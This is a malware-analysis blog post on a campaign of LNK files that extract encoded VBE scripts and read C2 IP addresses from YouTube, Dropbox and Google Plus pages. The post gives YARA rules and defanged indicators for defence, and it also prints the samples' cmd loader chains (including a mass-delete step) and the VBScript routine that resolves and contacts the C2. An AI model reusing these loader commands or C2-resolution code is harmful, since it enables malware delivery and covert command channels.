YouTube is my C2

A couple of days back I tweeted about some interesting LNK file samples I had found on Virus Total. They were interesting due to their endless Russian Doll-esque style of behaviour which involed extracting VBE script upon VBE script, patching headers and reversing bytes.

As of 31 May 2020, I’ve identified eleven samples dating between 2020-03-02 to 2020-05-29 as uploaded to Virus Total. They are all consistently created from the same VMWare host using the same account, and the same base LNK template as seen by the output of LECMD:

The LNK Files

SHA256 Hash TargetCreated TargetModified TargetAccessed SID MachineMACAddress
1be621c3cd6f26f3ccce00ec492b92bc7197537d7be34ddda06a1ebb15136184 2010-11-21 03:24:03 2010-11-21 03:24:03 2010-11-21 03:24:03 S-1-5-21-2529457200-49751210-1696528657-1000 00:50:56:c0:00:08
20026af8c1bd95d4a39c2d1d1c2909ed133a5d2efac2d6c6b87cbc4d2782fef0 2010-11-21 03:24:03 2010-11-21 03:24:03 2010-11-21 03:24:03 S-1-5-21-2529457200-49751210-1696528657-1000 00:50:56:c0:00:08
26fd8d1abe275f611779951c1687c3e04091dba12147500409e2db59b7bf6de1 2010-11-21 03:24:03 2010-11-21 03:24:03 2010-11-21 03:24:03 S-1-5-21-2529457200-49751210-1696528657-1000 00:50:56:c0:00:08
2f92936228e4e83ddcb040267bac970908c4d3ed41bc636f808feb7a2eb60044 2010-11-21 03:24:03 2010-11-21 03:24:03 2010-11-21 03:24:03 S-1-5-21-2529457200-49751210-1696528657-1000 00:50:56:c0:00:08
48de3d2ba47f482e912792ef677fec95557da5d14eb65321ff8290e59531076a 2010-11-21 03:24:03 2010-11-21 03:24:03 2010-11-21 03:24:03 S-1-5-21-2529457200-49751210-1696528657-1000 00:50:56:c0:00:08
62901e68c0c990a7ee69a2954f931dc643be430a8d09f316974d88a0ed97a268 2010-11-21 03:24:03 2010-11-21 03:24:03 2010-11-21 03:24:03 S-1-5-21-2529457200-49751210-1696528657-1000 00:50:56:c0:00:08
65469ae4cb1f05ea1b7a174cbdfbb63021cc2971693a29e226dc510dec20dc3e 2010-11-21 03:24:03 2010-11-21 03:24:03 2010-11-21 03:24:03 S-1-5-21-2529457200-49751210-1696528657-1000 00:50:56:c0:00:08
7eb4ea6277bd62653cc474cf1125165c9bdc43858811c0d88be25e2ec34bc14d 2010-11-21 03:24:03 2010-11-21 03:24:03 2010-11-21 03:24:03 S-1-5-21-2529457200-49751210-1696528657-1000 00:50:56:c0:00:08
83d6a78e4e03fdf0447502626df4931099b57fc557ef0fe22032e34733d494e1 2010-11-21 03:24:03 2010-11-21 03:24:03 2010-11-21 03:24:03 S-1-5-21-2529457200-49751210-1696528657-1000 00:50:56:c0:00:08
bbd2a1f2cb9b929e4ca09310caeb43c7257ebdd7c3872b8f62645eb659c4c89d 2010-11-21 03:24:03 2010-11-21 03:24:03 2010-11-21 03:24:03 S-1-5-21-2529457200-49751210-1696528657-1000 00:50:56:c0:00:08
d7d74fafc0c4a65e080c04479a0f1fd1da8cd34aee59e88ac49de3f844362416 2010-11-21 03:24:03 2010-11-21 03:24:03 2010-11-21 03:24:03 S-1-5-21-2529457200-49751210-1696528657-1000 00:50:56:c0:00:08

Further the initial command the LNK file uses is the same pattern similar to either /c copy Ack*ume %tmp%&%systemdrive%&cd %tmp%&attrib +r *&for /f "delims=" %a in ('dir /s /b *') do type "%~fa" \| find "#@~^">.vbe&CsCRipt .vbe "%~fa"
or
/c copy *.doc %tmp%&%systemdrive%&cd %tmp%&dir /b /s *.doc>o&echo set /p f=^<o>.bat&echo type "%f%"^>z9>>.bat&echo findstr /R /C:"#@~" z9^>1.vbe^&cscript 1.vbe^&del * /S /Q /Y>>.bat&.bat:

SourceFile Arguments
1be621c3cd6f26f3ccce00ec492b92bc7197537d7be34ddda06a1ebb15136184 /c copy Ack*ume %tmp%&%systemdrive%&cd %tmp%&attrib +r *&for /f “delims=” %a in (‘dir /s /b *') do type “%~fa” | find “#@~^">.vbe&CsCRipt .vbe “%~fa”
20026af8c1bd95d4a39c2d1d1c2909ed133a5d2efac2d6c6b87cbc4d2782fef0 /c copy SMP*.txt %tmp%&cd %tmp%&attrib +r *&for /f “delims=” %a in (‘dir /s /b *') do type “%~fa” | find “#@~^">.vbe&CsCRipt .vbe “%~fa”
26fd8d1abe275f611779951c1687c3e04091dba12147500409e2db59b7bf6de1 /c copy *.doc %tmp%&%systemdrive%&cd %tmp%&dir /b /s *.doc>o&echo set /p f=^.bat&echo type “%f%“^>z9».bat&echo findstr /R /C:"#@~” z9^>1.vbe^&cscript 1.vbe^&del * /S /Q /Y».bat&.bat
2f92936228e4e83ddcb040267bac970908c4d3ed41bc636f808feb7a2eb60044 /c copy *.doc %tmp%&%systemdrive%&cd %tmp%&dir /b /s *.doc>o&echo set /p f=^.bat&echo type “%f%“^>z9».bat&echo findstr /R /C:"#@~” z9^>1.vbe^&cscript 1.vbe^&del * /S /Q /Y».bat&.bat
48de3d2ba47f482e912792ef677fec95557da5d14eb65321ff8290e59531076a /c copy Ori*.txt %tmp%&cd %tmp%&attrib +r *&for /f “delims=” %a in (‘dir /s /b *') do type “%~fa” | find “#@~^">.vbe&CsCRipt .vbe “%~fa”
62901e68c0c990a7ee69a2954f931dc643be430a8d09f316974d88a0ed97a268 /c copy *.pdf %tmp%&%systemdrive%&cd %tmp%&dir /b /s *.pdf>o&echo set /p f=^.bat&echo type “%f%“^>z9».bat&echo findstr /R /C:"#@~” z9^>1.vbe^&cscript 1.vbe^&del * /S /Q /Y».bat&.bat
65469ae4cb1f05ea1b7a174cbdfbb63021cc2971693a29e226dc510dec20dc3e /c copy Pro*.jpg %tmp%&%systemdrive%&cd %tmp%&attrib +r *&for /f “delims=” %a in (‘dir /s /b *') do type “%~fa” | find “#@~^">.vbe&CsCRipt .vbe “%~fa”
7eb4ea6277bd62653cc474cf1125165c9bdc43858811c0d88be25e2ec34bc14d /c copy Law*ves %tmp%&%systemdrive%&cd %tmp%&attrib +r &for /f “delims=” %a in (‘dir /s /b Lawves’) do type “%~fa” | find “#@~^">.vbe&CsCRipt .vbe “%~fa”
83d6a78e4e03fdf0447502626df4931099b57fc557ef0fe22032e34733d494e1 /c copy Ack*ver %tmp%&%systemdrive%&cd %tmp%&attrib +r *&for /f “delims=” %a in (‘dir /s /b *') do type “%~fa” | find “#@~^">.vbe&CsCRipt .vbe “%~fa”
bbd2a1f2cb9b929e4ca09310caeb43c7257ebdd7c3872b8f62645eb659c4c89d /c copy *.doc %tmp%&%systemdrive%&cd %tmp%&dir /b /s *.doc>o&echo set /p f=^.bat&echo type “%f%“^>z9».bat&echo findstr /R /C:"#@~” z9^>1.vbe^&cscript 1.vbe^&del * /S /Q /Y».bat&.bat
d7d74fafc0c4a65e080c04479a0f1fd1da8cd34aee59e88ac49de3f844362416 /c copy cov*.jpg %tmp%&%systemdrive%&cd %tmp%&attrib +r *&for /f “delims=” %a in (‘dir /s /b *') do type “%~fa” | find “#@~^">.vbe&CsCRipt .vbe “%~fa”

All of these were identified using the two yara rules. The initial rule looks for LNK files with a VBE encoded script:

rule LNK_with_VBE { 
 meta: 
  description = "Detects LNK file with embedded VBE script" 
  author = "@mattnotmax" 
  date = "2019-11-16" 
  hash1 = "D28C1C4F4C705B21E84ADADB42594E42543DF4F1C4B44219569DC18B375E78E3"
  strings: 
  $a1 = "#@~^" ascii 
  $a2 = "^#[email protected]" ascii   
condition: uint16(0) == 0x4c and ($a1 and $a2)
}

The second was based off the initial hit which was solely looking for this campaign and and focused on the SID:

rule weird_LNK
{
	meta:
    
		author = "@mattnotmax"
        comment = "This is SID from the inital LNK"
		date = "2020-05-22"
		
	strings:
		$SID = "S-1-5-21-2529457200-49751210-1696528657" wide
		
	condition:
		uint16(0) == 0x00004c and $SID
}

Down the rabbit hole…

Some of the LNK files have more elaborate layers of data encoding and/or obfuscation, but what makes these interesting is that they use YouTube and/or other domains as a engine to get or update a c2 IP address.

SourceFile Domain 1 Domain 2 Domain 3
1be621c3cd6f26f3ccce00ec492b92bc7197537d7be34ddda06a1ebb15136184 hxxps://youtu[.]be/AApRxqOjLs4 hxxps://plus[.]google[.]com/109526023785415750407/posts/1ecFp1jLnX1 hxxps://plus[.]google[.]com/105611301541879878976/posts/fCo9jvzZKNT
20026af8c1bd95d4a39c2d1d1c2909ed133a5d2efac2d6c6b87cbc4d2782fef0 hxxps://youtu[.]be/aZRJQdwN4-g hxxps://plus[.]google[.]com/108098760042015113400/posts?hl=en
26fd8d1abe275f611779951c1687c3e04091dba12147500409e2db59b7bf6de1 hxxps://dl[.]dropboxusercontent[.]com/s/vz5unuqw4n1smun/index[.]html hxxp://www[.]youtube[.]com/watch?v=EsVgsH-NfD0b hxxps://www[.]youtube[.]com/watch?v=EsVgsH-NfD0b
2f92936228e4e83ddcb040267bac970908c4d3ed41bc636f808feb7a2eb60044 hxxps://dl[.]dropboxusercontent[.]com/s/7ttsyz4ypnco0sd/file[.]html hxxps://copy[.]com/hSn32C8TeJKq/file[.]html hxxp://www[.]youtube[.]com/watch?v=8Sxcin85wxQ
48de3d2ba47f482e912792ef677fec95557da5d14eb65321ff8290e59531076a hxxps://youtu[.]be/aZRJQdwN4-g hxxps://plus[.]google[.]com/108098760042015113400/posts?hl=en
62901e68c0c990a7ee69a2954f931dc643be430a8d09f316974d88a0ed97a268 hxxps://dl[.]dropboxusercontent[.]com/s/vz5unuqw4n1smun/index[.]html hxxp://www[.]youtube[.]com/watch?v=EsVgsH-NfD0b hxxps://www[.]youtube[.]com/watch?v=EsVgsH-NfD0b
65469ae4cb1f05ea1b7a174cbdfbb63021cc2971693a29e226dc510dec20dc3e hxxps://youtu[.]be/aZRJQdwN4-g hxxps://plus[.]google[.]com/108098760042015113400/posts?hl=en
7eb4ea6277bd62653cc474cf1125165c9bdc43858811c0d88be25e2ec34bc14d hxxps://youtu[.]be/AApRxqOjLs4 hxxps://plus[.]google[.]com/109526023785415750407/posts/1ecFp1jLnX1 hxxps://plus[.]google[.]com/105611301541879878976/posts/fCo9jvzZKNT
83d6a78e4e03fdf0447502626df4931099b57fc557ef0fe22032e34733d494e1 hxxps://youtu[.]be/AApRxqOjLs4 hxxps://plus[.]google[.]com/109526023785415750407/posts/1ecFp1jLnX1 hxxps://plus[.]google[.]com/105611301541879878976/posts/fCo9jvzZKNT
bbd2a1f2cb9b929e4ca09310caeb43c7257ebdd7c3872b8f62645eb659c4c89d hxxps://dl[.]dropboxusercontent[.]com/s/7ttsyz4ypnco0sd/file[.]html hxxps://copy[.]com/hSn32C8TeJKq/file[.]html hxxp://www[.]youtube[.]com/watch?v=8Sxcin85wxQ
d7d74fafc0c4a65e080c04479a0f1fd1da8cd34aee59e88ac49de3f844362416 hxxps://youtu[.]be/aZRJQdwN4-g hxxps://plus[.]google[.]com/108098760042015113400/posts?hl=en

An example of the YouTube video is as follows:

youtube

All in all 11 different URLs have been identified to date:

  • hxxps://youtu[.]be/AApRxqOjLs4
  • hxxps://youtu[.]be/aZRJQdwN4-g
  • hxxps://dl[.]dropboxusercontent[.]com/s/vz5unuqw4n1smun/index[.]html
  • hxxps://dl[.]dropboxusercontent[.]com/s/7ttsyz4ypnco0sd/file[.]html
  • hxxps://plus[.]google[.]com/109526023785415750407/posts/1ecFp1jLnX1
  • hxxps://plus[.]google[.]com/108098760042015113400/posts?hl=en
  • hxxp://www[.]youtube[.]com/watch?v=EsVgsH-NfD0b
  • hxxps://copy[.]com/hSn32C8TeJKq/file[.]html
  • hxxps://plus[.]google[.]com/105611301541879878976/posts/fCo9jvzZKNT
  • hxxps://www[.]youtube[.]com/watch?v=EsVgsH-NfD0b
  • hxxp://www[.]youtube[.]com/watch?v=8Sxcin85wxQ

The website copy[.]com was discontinued in 2016, and some of the YouTube videos were uploaded between 2013 - 2015. In essence the key (and only) text in the links is then fed into the VB script and divided by 1337 to obtain a decimal IP address. For example:

WHILE serverExists = 0
		Dim min, max
		min = 0
		max = 1
		Randomize
		
		randLink = YouTubeLinks(Int((max-min+1)*Rnd+min))
		'msgbox(randLink)
		outputHTML = getPage(randLink, 60, "get")
		'msgbox(outputHTML)
		Set objRE = New RegExp
		With objRE
			.Pattern = "we need (.*) views"
			.IgnoreCase = True
		End With
		
		Set objMatch = objRE.Execute( outputHTML )

		
		IF objMatch.Count = 1 THEN
			server = ""
			server = objMatch.Item(0).Submatches(0)
			server = server / 1337
			'msgbox(server)
			server = IPConvert(server)
			server = "http://" & server & "/B2mV-VzVc-81Az-135J"
		END IF
		'msgbox(server)
		
		IF Len(server) > 1 THEN
			status = getPage(server & "/Status2.php", 30, "get")
			inOK = inStr(status, "OKOKOK")
			IF NOT inOK = 0 THEN
				serverExists = 1
			END IF
		END IF
	WEND

Yoo Hoo, What’s the C2?

So from the links still available (I didn’t have a throwaway Gmail on hand to access the Google Plus links) the obtained C2 addresses are:

URLs Integar Decimal IP Resolved IP
hxxps://youtu[.]be/AApRxqOjLs4 1962110654532 1467547236 87[.]120[.]254[.]100
hxxps://youtu[.]be/aZRJQdwN4-g 1962036338724 1467491652 87[.]120[.]37[.]68
hxxps://dl[.]dropboxusercontent[.]com/s/vz5unuqw4n1smun/index[.]html 49741276945318 37203647678 169[.]130[.]156[.]190
hxxps://dl[.]dropboxusercontent[.]com/s/7ttsyz4ypnco0sd/file[.]html 19907899063843 14889976862 119[.]131[.]4[.]30
hxxp://www[.]youtube[.]com/watch?v=EsVgsH-NfD0b 49741276945318 37203647678 169[.]130[.]156[.]190
hxxp://www[.]youtube[.]com/watch?v=8Sxcin85wxQ 19907899063843 14889976862 119[.]131[.]4[.]30
hxxps://plus[.]google[.]com/109526023785415750407/posts/1ecFp1jLnX1 N/A N/A N/A
hxxps://plus[.]google[.]com/108098760042015113400/posts?hl=en N/A N/A N/A
hxxps://plus[.]google[.]com/105611301541879878976/posts/fCo9jvzZKNT N/A N/A N/A
hxxps://copy[.]com/hSn32C8TeJKq/file[.]html N/A N/A N/A

Whaddya Gonna Do?

There is a lot to this campaign, both malware analysis and questions. The files also contain DLLs, decoy documents, more VBE scripts, and C2 commands. This all could be analysed along with the identified infrastructure and their own associated links. Given the videos were created so long ago, I have to question if the C2s are still active; however, that beggers the question who is and why are these samples being uploaded now? While the C2 channel would resolve to a raw IP address (which may stand out in certain environments) it does allow an adversary to quickly change the C2 IP without having to update the malware itself.

Social media are well recorded as being used by actors for various means, this is just another example I hope people find interesting. If you do any follow-up or have any thoughts, questions for comments, please drop me a note at [email protected] or at @mattnotmax. Thanks for reading!